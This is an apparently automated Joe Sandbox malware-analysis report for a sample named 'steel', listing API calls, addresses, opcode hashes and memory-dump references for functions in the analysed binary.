                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                            • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                            • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                            • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                            • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                            • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                            • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                              • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                            • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                            • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                            • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                            APIs
                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoScroll
                                                                                            • String ID:
                                                                                            • API String ID: 629608716-0
                                                                                            • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                            • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                            • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                            • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                            APIs
                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                              • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                              • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3319771486-0
                                                                                            • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                            • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                            • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                            • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                            • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                            • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                            • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                            • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                            • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                            • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                            • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                            • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                            • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                            • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                            • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                            • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                            APIs
                                                                                            • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExtentPointText
                                                                                            • String ID:
                                                                                            • API String ID: 566491939-0
                                                                                            • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                            • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                            • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                            • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                            APIs
                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                            • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                            • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                            • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                            APIs
                                                                                            • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                            • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                            • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                            • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                            • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                            • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                            • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                            APIs
                                                                                              • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                            • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                              • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3202724764-0
                                                                                            • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                            • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                            • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                            • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
